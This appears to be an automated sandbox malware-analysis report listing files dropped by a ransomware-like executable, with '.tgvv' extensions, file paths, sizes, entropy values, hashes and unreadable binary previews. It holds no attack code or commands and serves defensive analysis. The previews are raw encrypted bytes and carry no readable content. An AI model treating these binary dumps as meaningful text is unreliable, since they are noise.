                                                                                                      Preview:OMCLG....eM.v...~.n.-O#;.X.ge..W.om`......B.7..u.i2.HurV.-.W.......=?..o.Q.h...2.2...6.U......a..c5.....q{.v..*wG.v^E.c..]..U.1)As.....J...<[.......|..]..qc.........r(.......B.*K.5.;..q.#78D.2 ......UI.^...?e.i...,<.e..m2 ..s...f.s.?..'.G...S..P...ps...K...xwS.BR..m...h.i.......#..l{...S.E...Ir..J.....l..^...~'......J.n.a...%..y](.-..B.UH......Y.....A.*U.|...J..b...b.._./...K.....k.NvhlQ...x.8G..W....S.b.D...g....*i.)m.........r(.v.+d.M,.B....:...$.l1....<...H.}z..`u.]D.-./&WA.H..n.....Z.JxO.....b...,.<....\..Je5...F...s.J...#_.c8Z~...}..~.*4.....f.".T.?M.Qj..w.1..zZ/.Mn.^.zi..Z.*.....&.9,..O..'...wU.7(.....9........j}....."f~.S..I;..;....j...T..".&y....G'n..O}..|WY.Iv.....z..j.:...7........x7f...7.."..dB..@.. .Sc&...<....L......Ch...sz.q.C.[.I.....zq.Q...R.Af.(U..$.e{.Y.#..i.......s...&.`..8.Ro.0P....[D...Z.b.Q+_+.y..........B.I.$.j......|u...h.E.u.....P.}8....O.'.O..Q=.....zjt4.cX;./.77..I.}..u..^.P#..1.-..X...D.._..X,..s<~..[K......8.)...

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\ONBQCLYSPU.png.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.862887684838192
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:xWdE78sJY7ulHKYRdK5QjzlrjiMLVCXONMAtUA5YB0v6bD:xWd+xK7udldKOjzlrjBHMAtUASB0wD
                                                                                                      MD5:E0CDDD0C3485D03CD7256B3B01991884
                                                                                                      SHA1:6C9AF03FB01A53E9982A6B67B25C3E7BFF5D5041
                                                                                                      SHA-256:ED5EFFC1F1BF6075AC7A6743241B0D80FE6D45C00A0A0F0D8F6202B55100A460
                                                                                                      SHA-512:67C3E3D66D6A37C5DB6CBE69214E3756A282C13EAFBC7B9477C7304989A8AA14A33941A8E9C9CE404E3FB8B1338B3E694A00625BD161B52E1A8EEF00C1B461A8
                                                                                                      Malicious:false
                                                                                                      Preview:ONBQC...".....;*.v.&Q..5..MX...e1a7~....)~.....imN;.<um.....8..g.s.l.L.!..Y..:..&...|...d...G4..~.bN.J....4.k. .Y.+..D. u....q.........P..RNY...EU..Ch...}..2....q.`k..=h5._A.q.U>j`..X}q..4.R.....,...=,..L.X?,....9..)...b.........2...}7..V2s...a..@.I..\4.x."`=m..A.[......#..#..x.W7......4.......=.!.MM........Bs...</+&(../..........gx.=J.0y.F.&-P.....$....q...[.{.-Ip.G.^.....A.....rD.-....gz.lx....v.8..U\..'d3%..m.u.T.....b.k.%@.........T.A.2......=.V2iD......T3.."~.._q.gKq.b...j.-:.Y..)D......8.....n5@7..ge...%.eo.3p.cO{F....Y.IxW....e0+.ym.p.......AM..=]L%8....!`ko....t q..q....Lf..o.I....i....3....E...cV7!G..K.b$...:.a..lz.....1..@.4.W.u.z.....I..;....',.]......k._t8..d....Q;b......(%2..:g...s.]\cj..P..9...<....t..}!."k.,h#..^?_L...|y...~s../E.n.V.G.-*..E.p.<...J..iM3I......... .7e.W.uo.....M.e4...j.Y...f...Y~...6.8...b*.X.R*.J.2d.z.(.v.z..V.Y..&*....x......R..K{.P....t.E.q.w..?.]*.e...d.,......o..NX}W.?...>;.Z.NK.O....A.L...k0."9.`.]..

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\QCFWYSKMHA.docx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.857782926515681
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:barGcEcAZ/F/EENuD0rSnkbNtkXNKIZMXVu//72VSUcOg9no6jvnV52uv6bD:kGcW/EEsDISMyXNdZP//+S7oWnVguwD
                                                                                                      MD5:A1898A9DF3DADB2EDC2807AD5EA7D9D3
                                                                                                      SHA1:98835876B09D368F3A334EA1E6AAEF2FCED44A21
                                                                                                      SHA-256:CBBFD774594123EA8763223A018876A60C2164B9C4285AB47865C02EE62C440C
                                                                                                      SHA-512:7B4670D4C5C585356D8403039F9A77EA841E84A07633C65EF293FC34FE2DD8A7E2135D5DE6950D0DFC4B6F76CC6B3106A4B5B2E8963D2FFD42AF01FB028DBF81
                                                                                                      Malicious:false
                                                                                                      Preview:QCFWY...."C...TtP..[J...B..!yg...@.t......*&t..'..5.u; #N..7.Z....$....Z.jm...i..,,."p...1e.^..L....@Q`.......-d;.ab.l\21h.eT!.|....!.1l..O..F...{..........nz...zv..P..$<...Hw.o.*...d....$.! .6..:...c....qb.E.l^....b?.U.......M.`...X....r...|+/?.t.....>......J].U.q..g...x,...y..pVQ....u.=.A.........U..U5..E.g.....{S.Z-..x...,.R..../...,.0:<Aj.5.X.]...~.(^.Az..9..W'.\.0...].s..J.B..D.x...7N...AS.Ax.W\...q.ry}.......TA..7.=i....#i.4.%^g..U.!..Y/.....?.......=...E.(Oj.S.v.@..5.Q....0k(..:..w.sO;..:!...G..Q.....F.S%.AC.T.y.e...+.[.V?.Pe.m?Z._..|3.jk.3..4.zY..s..`.hc..US.JR.V.[5......"....Gt.TI..;..bc....c\....P/.x.~....k..g.9x.......K'.4&.=..(.&of......d.p`.9Oac....48~.D?#.3.g....Db.....J.R.;@.P.uz..Z.EL:......Q.y.......1f9.*.....]......(.l....An.H....8-.o..K....`lr.>..... W./....)..Zf.ep..RP ..&..}.C.3LlLib1.w..'...{.......<t8]......\m..Z}....x32..3.emo.u..J.)P.X..&".p...T.z..H.>1.5._.{_}7V&....%V8.P.)..`JI.o..zP..4tO/.Ux\.3.X|&.@.f.rC...r.7

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\QCFWYSKMHA.jpg.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.828429896346449
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:N3Oh9QtULGBPO/mn5dKo3id3pkqBLUyDkbwvGGmTDIPGcnKoK6a2v6bD:xSzwPO/meiIkPnQmvIpM6a2wD
                                                                                                      MD5:E7B4AC8A81F2BE6EE50A67E2802C5EF9
                                                                                                      SHA1:26E509AA3F95B33C19643EDDD5CFA7CDF777FD6D
                                                                                                      SHA-256:D300E4BA95335F820A6B6EA2219FED8E040C6568C973671EAF111B4A450C33FB
                                                                                                      SHA-512:28EFDB3B30A2EDBD470F2F00D260463B07BB98404A87E0223262EB240D53D9F1190FE5648CD580F4CA3E8CAA238A50EA756D1BA4101D6691A62101F58FD48944
                                                                                                      Malicious:false
                                                                                                      Preview:QCFWY.....u.(..v@"}Kkr!.Y..g.H.qK...n....4....?.|.G..~O..3.`.hG..Sj~...+..T!.H...C.R!Y$..'}Ld.=W.ci....r..{.wf!h..?A...0..yLb.D_...M.BO.65I.&j....%F.1...o.=$.v.tP._.....\..{.k.......IBp...k.....g.lZ5y~?...o.........k......q..(...X.|.3....t...j..5X:...~.z...G..(Y$.z..BB....C.qIx...zz..8tx..O..?3G.....W....&..T...+..&.z..n.]...h....%...Q.WB..W.lz....1.Tc5....GG.lQo...5ZZ.|....,.....6....f.....&..SXT#.....%.\.........q......q.......I..+...Q...0L...Y..k.'.~......\o.>|.H.A/.!.H.:.j.4..s_...J....jy..2F.[/..A*.:+V...q<9.M..e..w....;...2...-7..Ad.o...;....!...sG/..)..F&K(.n4.....xR*=aZBF.2..+./..<.i..L..%0._..\P.Y.:?.p...Tc?.N.0?...z;Rp...$...z.*.D.......|..*"t....:&!.4.H..~.B..#....9[.c$&..{M.....x.h.....r...........7.u.d&..bAYk..%.-....y2SD-cBa..;.@....d f...)..f..{..iz...R}o.../......@.!...zx`B={i0G..M2...<.j...Y..'....SV.[......O=.......L..y...>..AqH..._&)GW..d.j.08...h..B].V_...v..T.:>..(....?.(.Ij...fh....t....W.D.q[zw...p.r.o.*..W...(.

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\QCFWYSKMHA.xlsx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.834968409194913
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:nZvcYmev5If6T2pZSvl9D7HoG99P9sMONwYPMsyCqhyW+K/7Pr3apCQcqv6bD:CORnGZUXISP9sMONwYPwmWx7WCcwD
                                                                                                      MD5:559CA9A249102DD01BF08AFB17274AEB
                                                                                                      SHA1:AD1F85AB27E995D2217F42979422D0447620C0FB
                                                                                                      SHA-256:A28FC987EF6C9A1B71470979C98B1F437385A4F0916B7AB7E6047168B5EFAFE1
                                                                                                      SHA-512:2733BFB4A39BC77E637E632333CE5AA7C119089085AEEE82530F103F2B94EFAD428B7BEC3D4221199E71B9D1EF706957E600714E8856CC39541D09CE5BADCE8F
                                                                                                      Malicious:false
                                                                                                      Preview:QCFWY..Ec...b.i.Q..;..H.AK..z^....q.0YRJE_.W.....v.8.:.8.....?..7......|.x.\.....z....`..?4.....=.i.70o....#.vn.mXL.%......Yl".7.46m...N(.i..s.....-.......oL.@...L.n~.7yk....T....{...q.....".H?$g.5F.w}.L%1..UI).8.s....d<;.jg.\..v......".N..M.0...u?>...B....42e._E......U..4....D.HA<!.....=CB..Qc.. ...5._mnnu5.$..(B.5:....R..%.J...:.{..*#.gSh.1......m'Q.W.....].O0..........U.a.G..`..#.Q...?..s..."v.n..%......o'..Do.Z.B..2.*..&p./%..|........$>f...K.k.."K>....z..2w....+a..m..+.9..JD.;b......$l.. s.Ey[....IS.j@.Z........[......t.<...0....1.@..2Uh.....C.&.p....*.vE.._hG.3D.(.V..&....b..s.E...[.6vv.Ak...G2o...b.i....`'~.....X......W..R..l.zz...cw.V...1..;..DE..MV.n. `.B{N.<;..3.;...5o.pR.Q..........U.5.R.8./j.......v.o.W...j.......:...[...D..0..?....O.W_<B......U..7.h+". ..v..L~.`Y9..;..i..".L.6b>.7R`..C{&=....~hltY....G.BM/z..+ds...F.$.Ii..........u.H.lQ!....Y..C..........s.x......S.1..Q.,.H.y.6.S.F..7......A.k.c%$.}......xef}ow.*Rw8 .RX......

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\RAYHIWGKDI.png.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.852947238477694
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:v5Tz0G5HWE9BRz1PP5nB7ZuvZvCKUfZ5+AUb1GxQTkpdA7ov6bD:RHDHWGB1NP5nWvlCKAP+AA1GSTkfA7os
                                                                                                      MD5:86DBF3FE89799AC2EA5884BB5A61834C
                                                                                                      SHA1:42947FF7110D0AB6D108C22C02A3463C496180D5
                                                                                                      SHA-256:3CA93E5EE7AAF67B827975BC9E6C8F1292F4B1092E6E2FF316DBFC5BC6D2FA7F
                                                                                                      SHA-512:3617B26E81CFCF8A980CF6AB6EF2BBC59E1772137FD69E94EBB43EABB4A9B5981DD6A456DE91FD48F9B865150A3424413B6F00287C68CB21CE6B06662CF0958D
                                                                                                      Malicious:false
                                                                                                      Preview:RAYHI.i..qe.....mHkT........J...".`...l.......+z&.K.g....#........q<..9....Di.<.b`x..+)l...v...W.w}.R.C.%..].c.K.....d......]..l1.7.2..(..g....;.hy...=.s../..K....K!..9.!..F....U...........S.]..]M.I.6G.:Q..g..[.......#...d,Z.....r.VM.p.....a..q..-..G.k.].}r.E2s.....}...t[..$.?..[>....0..mw...n$..t...D..-.9..J..9u......{.;g....5.$7.;F..S.~...).....8..y|i..Dg.....KU..7[...?..t7.e4.........i.I.#.b.l3.......R.}.@...<.):p.6..E!..z.`...'..8.>...3.......wF........^..7..:.-..........z...9.=V..b.U`..b.x.....&5.....n.iO.r.........R....h.....u..........`..........TI..m^x...."....Gd.*L.I[..a,....p..g.LD2...O..D;.B...[.M...d..... .J6;.).}....9....Z.<.t..+C...a._z....j..p[9..U*T..R7..........l..5......z....y].5e........m.Xv.....^'..&.Ul...............4.-J11.`..{...i7...ly@P........Q.O....^..b..T......k...:~,.7...o. ..... .Fg.-nq.5...Mr...$.P.f../.R........a.Y.:....A......~FZP...t..;3...1...H....'.u\&@}..<:0...Q.r.&. ..*~.b.p.W.2f%F.......Z.

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\RNCDIJFLUP.mp3.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:PRO-PACK archive data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.838854937122424
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:idmn6JZzp6xoWHxYI7mFTv3ZtEtelQTDZwKe+wawSL7JbMllA/ZCwzLcxzI/mqcO:em6ZzpmoK4l3ZStelQ/qKFvLtb2wzLce
                                                                                                      MD5:CA743E20E46D4E9E78CEC72913CB22B5
                                                                                                      SHA1:2E310DCA2058CA07BFE6D3F97FCE3B9AB58E8BEC
                                                                                                      SHA-256:2AE7700C7168B5A7719B1295B17B8E50E8FCAABF5D5EBF91D13133A1B98EE67E
                                                                                                      SHA-512:85A200FF902584CD42820212E07671F9F7A490BE061E9333577D7D0D597C990BFFA26714C03E502C2336CFAE74C36615FFEACA05DF5E0CAD5CE7737D11254656
                                                                                                      Malicious:false
                                                                                                      Preview:RNCDI.wn.........$UE...'.=..Z-.....k..'00.a.B....@..........Q?N|...$Y..n.C3....._.b...l.j."....#./....j....RGpM........i/=....Q.......U..4....m.<.t....:i.P..S+..x.".h.7kA...p..t..H.Yx9..d.P..QJ....o..h....{.tO1s(A..4].0=..GS......S.PK.y.P..={37f.0.....S...u-.o|:...n....I.8GdGg.-o..&.<........L.........>.Uwid.....%...9.=.y.l~B(.......R.4.o1^5w...\`.1TSj.....*=.?.g..})......V ..........,t7.g".O.j*Ggh... .}".,.....L....z.n.7|..Q.:....SL.........y.c`...d`..........Q....o.x...d.....bY...s..a....C....sD$.<.B.7.M...6..6b6.,@.&..o.........=...Z..9@s....;..^..,o...`..TMp..EIo..2.c.Y.]..er..`@R..A..*zJ.....:..vo#..n...58.... ..,..74.?H.EapJ.g"#..&.G6.o.\D....<...|.y..CS=R...(.. .I4..2!......m-.bm...h.L.H1l...?...^.(Y9l.W.N.,Y.....w...F/......s..Eq...8.W.z...rU...T......+m....,"!.V..b4YJ.r2.@....>...X.}Q..N.....R.Z...'.I....&.mPe..^.4J(US..r..C....E.[.....Q.. ..;..~...`.O.R5..~3Xp..z..-.:\.."z.. .;.&....jd......r"5..v.=....{.W......m5..7t..bc.......-.m>...h

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\SRIWZTPNYW.jpg.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.849481720808541
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:m39yvIwa6AnyYR6ju/sCBbVG4qTKcs5Ur3LziSeyPXNbKjoCAO+0v6bD:MyvIhtvwuh/PrnUnzMcEkCvxwD
                                                                                                      MD5:F392B398A450D5A2D6BBF3824798A924
                                                                                                      SHA1:E8F358F531F31DA3C98FFDF8561B9A2FDA4BC4CA
                                                                                                      SHA-256:97E6F4F77A95125F0E78BBA86A7A600D6570C5B435A020D65791FD5430797B8F
                                                                                                      SHA-512:6389DE58E865D2756474CE777986173D093D9DB6225968ECE31F86C17BD7D62E16A05CC5CF62C71A5CA67E88DBB885E422F465B1402FA8B1D8D44C26D534C340
                                                                                                      Malicious:false
                                                                                                      Preview:SRIWZ.....Uy....6..G_....B..fO.j...u!q.}.L@.6.\.J..*!.>.c...49h."........1...&K?.A.....da....8q...cO....#*....eu,.....\..`.%.y.....#=.. w.....&......u0..!.._u....w.A./... ..c...Ad6rg.uYh.De.d|.Z......9.m.wy.;Vd.W..#..`....y.c/i..S,,9.:....x..0...J....T.%*.O.u...|.....rD....hsQ.KH.2X...ek..>...d..T:...i2...m7|r|....Q....%...lr.h..V..._....-x..]...U...... ._.~.B./....U......T.o....k .$~.w.......K?.....v.B*.8.}'V.......w).P..8f.....ES....j.`...)D.ul..I..;......".....T.... .@...-x...M......s..~G ........+s~......<sY...;`2..{...g.H...U.b.M.._.{.3.8%.s..zI.3.>.......T.F.r..u.|[@.._..6..$.fG..G...p.^."osZS...@1.....+R0.....3.c..+.'r.6V.../......U.N...DW.ehio...;.M.G.}]$..?%I.I.Km.\.*...T..A..!r.).vK....3D..k.....%D......ph.m.-.@N....LBs.....:....@o....0.......%t4..Or......88.0....h.Q&s.Iwn3.>X......O._.q.....|..S.1....L......v.o.....x}6-.b.BfR.B......H...X...S.a.....h..nE....=..b!.........G/.........T.F.Ko...eZ!.~.........C$...Iv^D.M2?.Mx{._.y.

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\UOOJJOZIRH.docx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.841409680648201
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:iFsz/dyicdsT4aPaOg0s1paGJgFV0n5pixQT5HezDdx5dCZmKMdUDv7CwTv6bD:iFkyiACjPaMmPgsCxQToDdx5AIdUDv7W
                                                                                                      MD5:01A5007EBB488AAC676AC0536E91F920
                                                                                                      SHA1:6EC00C0567A84BC5F955FA1D0EE4F30928AC80DE
                                                                                                      SHA-256:A922CA70AE593956254A363B346EB3379B02952671F30A137571BCB8C18BA15F
                                                                                                      SHA-512:42BA52E9BD1FBC553EA7A6CDCF2D3AB63F713D74C564E1C22CA1ED4B94E21324BB896F9929CD723C88F9054DE715B86427B991FEF6114D01730F2FD591C21F2E
                                                                                                      Malicious:false
                                                                                                      Preview:UOOJJ...........Sx.O.....@.;.....p.....|:.K........1..A..?.bXAD.~..W.......o4.p.(^...<..../<#..0..V....@...[.............,...-....+..;p .I..3...._..0.H.;x....vu....?..v.-..{(..!y..-.Z^..R....BHT.......C...].....xd..<.5..ve...|.Xj.........z.?....o.}.a.2.c....M.=..=.......v....u.....T.@..*..@o~....i..L_K...}&....d.y-:.[..q....J_..0.K.@`..>..b.^..#hh&t>p.k......v.2....Vk...!.^uz./.n`..g..}..)..........0..v<.me..:Wg........h....N.L.........<.`~..(O..evO?^.....0.....N..F.t..Q8...T...9..<oY|3~A)q........W.]eLs82u...ye...J.1V&..O....?9.5.f|..$.b..5..f...u.K.;..(..Do.L$a!.......Z...?.2.n.D....x.S...c...W..O4.C5Q.bG.s|.....].p.GG....C..jqNZp....>...).....| .3..Q.g/.:.....7... %......|C.I......{E .c..&.u...5..0e.&.Az..5=....g p./=.xa..;...U.6}.,.>...P". .....d.>....X5..."...b......o.....(.A.....q.......wf,w.INs.F.Z.[j....N.....V=......].....y.WE........(Sb......b.....T.C...H.K...~..^...H.Bs....B..$...=@..}...Aju.......f.......]m..:.{.$.T

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\UOOJJOZIRH.pdf.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.872371729501544
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:pDyv+gjR74TU2CXVtH6far02QjO5pKdhRfK2gk7rc5Hwbs6ciASjv6bD:pDyvV8U2OkfaryypKdnid1i3jwD
                                                                                                      MD5:C9647220951878E23E40888EED3C73F4
                                                                                                      SHA1:DF28623A151F99D68140E692E28400DE52E0C15D
                                                                                                      SHA-256:392C652D7E70CDFD4614C1DB9493140D4228B0AF4C16C8B2EFCDF4E49FB01204
                                                                                                      SHA-512:50B126064A499946A4AC04338B70A15AA61751D9B49CB8F6E3A46B4DB034890035A197EDEE0A189C5EEFBAE02A2267E71EA90579FCDA982C477973FC615A2E75
                                                                                                      Malicious:false
                                                                                                      Preview:UOOJJ@*....~..P.N.Ky.X}.Y@P..."..v.Q..4"t)...t.Y.w:.. .`............o.S...1)0/.....h.Yz..Rs..w..!?e....j.w......N......8D.....n.,..S..^.......I.(...Q....xU4.]VY.)x...n.A5....?@H.K).........aJ.Ql..<.W.^`....c.>.....G.....,....i."$....7..........8.P..i...3....,..W......1..P.8W[%.D...|.w#J9..ap2i.;P..2.qv.4f........8.....;_a........."6[1]....y..K?kUN.....I~;p.H..bX...Jv.!..H..^..y.wEh.a...Yq..H<%b:........E...Ew.!...A...(...c. .H.....I`?..W..7.w.m.\..u........u.2w^..U.i..C.U.d<...R...<Vp...@..w0.&.R<..F....%..+.^/....L...../5...4.H.....1Z.Z...:.x......5.i.....I..B.E.'n..w....F...........|..Wq...E.#...;<...s..q...l@...H...V....v.p..&2.&....l&...l2....(^L5T.....h....'..<c..+.p.ukw..@....|.y;W..^Q....s./.q.2L..o..nN....g.....V4....Tm.`zF......paK.~_..K.<..\.$Z80....-!..............y.)lu2..3W....3m....mh[t..V..4....h...\..#.#I..{...t....J....<.<..S.y..J.~l........g...].Eu...J{..vh...z...}..KS.nf...Ck...r^.=.e.'....k..r...&\..e#..al/..l...s..

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\VFMANBAXKI.png.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.815767128262009
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:LA70sdsyIraGnRHimMprH1MjC5kGVzKZ63T12zYEMUVAN2Gj1gWv6bD:LAwisXraGEm4ujjGVOEhwXGhgWwD
                                                                                                      MD5:B50C22E8EC39C30A1A44AD5F7AE5755D
                                                                                                      SHA1:A7F9E94C963CF2EB785FBB8B3EADD3AA20906291
                                                                                                      SHA-256:CC7FC14DF80800F738298022038FC1BDA96881C8960CE521212D087D99EF31F2
                                                                                                      SHA-512:247D59CC23D5731C6158CD07F59886807D20D7429100C6066FA78C208DCDFC5D9D998A404E1DCB6D1554A47DB93D469EFCD593412259F2E5949AD1090EA8A920
                                                                                                      Malicious:false
                                                                                                      Preview:VFMAN\~p.B?C.fE.a$..Y.5.sv.....*l.............S..o...Oz{S..O... sd..a...6r.."y....!.b.]....o....![.=..O:..*...}C1.c.Q.B...~.eC.].h...%.*..B..D~...QT9hS.l5~2....5r...H..|.\?U..Q.4.Q]T..+p2:...q.X..I.7r.rC.Z.B..{...35x.S..1.....>.\.....-.*. .....8..Z-...T......1.G.)g^....6\.p...../".j.:7..(..... .?e.d.*.w$f.s...q...m..t(..h.....m...,......T.{...=......y.X................._2O5knC..t]......4..2.3..t....H.Kj.oDe).... Wb....!..b....|/...1..\..=....Y81=y.J0@...;4...w..)..kcqR0...I.{...W..Z..as.Z.7u.)....$9.n~|.=F...p_..t...c...inE...o.Y.1.r.J...-N4.g.O..&..8.\..9.AU...b.2......o.d.-l.\.tIqGB...H.<..8:8-.....7z....p....k.......g.ac......-p........$......h.*:..2i7.jo.{PO....^4.]...(..c....n...x..H.........c.0...i...!N;.y.j......tB...E......"QsE]:l.._.1.y..lSG..g5...H...<.>.2.6.)=...s.L.R.....D.d T.3/U...V.'......G....0F..._-z7....m...|...M.P...f.pDp.(.ED.}....S......p5....27.N.}.fU6.hn.....: 4...O.ZS..........a.t.P..x.pU.:lD."w.o.}s.n...7.

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\VLZDGUKUTZ.mp3.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.864983791073387
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:yrCgvJvX9ZkCEuJ3t/O9wRLz63dh+jeRGhhwM8c89lUgcdHY2GdQ68v6bD:ivZLZ3BO9wtz6NeeMLMcYUc7Q68wD
                                                                                                      MD5:E21D8C9F9E2159282288B9377ED1404A
                                                                                                      SHA1:6E781759C32A72C65547057CA9A5BC8208606BF8
                                                                                                      SHA-256:E55CB365ED14525D656EA9367AF750D85D23D5C8A706DC77FA50678923F2AB4C
                                                                                                      SHA-512:85E120D2B410F9F36B16158781D74F999DBE7C9E705B67CCEE846FE38260DE0B5593039D04EF1EC5991183A949E5F923ED142EF9FDFFEA9560BE3E511440CA02
                                                                                                      Malicious:false
                                                                                                      Preview:VLZDG.?`..2.....3....\d...K.K.<".......|b...7....Gl..mnEq.J.N-_.....X..P.3....B.....g.......2.oW......m....K.C.FI..&...#m...xNRNl..tWZ..(.P5..... k..]ff....>.n.c.6.....rn....~.-Ql0G....b01.d...!...,..|....a.=...U&.p. ....,]...e.....z.....y..{.!.`..#&.*_f1.....F...) ,..G...l.3.i[!.."......r.d....C....%.9...7^...r....u..mCQ ...W.C.X..|.|........s.l..4wR/..,.V_g@.$..z-....Yq...N]K..d...u...Y.G.Z{...%..T..!.A..m..J..Z...(.3.....:......8.......[..fy.H.}.vY.$..L...H]...K6K...n.y/.G.w..,g.........=z..Xf..v..Fc......f$A.b.V....f.N-......wT_V;.+...![~..S.k.u[..-.Hg......G....8.U~%..K..k.......j...v...;<T.A./.X.^R..C.l...a.g...}.'.VBa.....c.Z.M.{...S..J).X.....i..(.=#.......S...g.v._..7E )..PU.....av....\,...D1.....dKTo.M...tO.x...O..yd...x...T............e.......:..;.....r$z%.=.l...R.D..H..MG....)..B6}.9N.O..-2.......[,=.Y......g5...@..<5.h...K......dx.G.k)...H$O#.8N.<z....;.a.$...#:.@%.c...FZD7...%...^.x.0... $../[.6L-..........@W

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\VLZDGUKUTZ.pdf.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.848604768251051
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:8Il+wkrgCghOVtBDy1KN2DdWiNjPCgmAqgUHbvKL4zV0uQTw1/MnmHO7G4v6bD:8a5CAatVy1q2tsgXqgUrKL45xQTs/Mnq
                                                                                                      MD5:4569252BD5C10DED2BABE2C9EF2FCEC6
                                                                                                      SHA1:6D6EA221502FEDB26DF4F29DA286DDC646DA9523
                                                                                                      SHA-256:CA381A66F81E5B0878726F95B287BED9471D63AA2E6223582D00967897833037
                                                                                                      SHA-512:6855E994C0A2C09E6243A3ACAE25A0CFC1E185C6C75D1054B7F5C71D5D9ED19D0D285A7C74CDBA326CE8E33886A52F3707FA8F5507AB75BF981D316364E81124
                                                                                                      Malicious:false
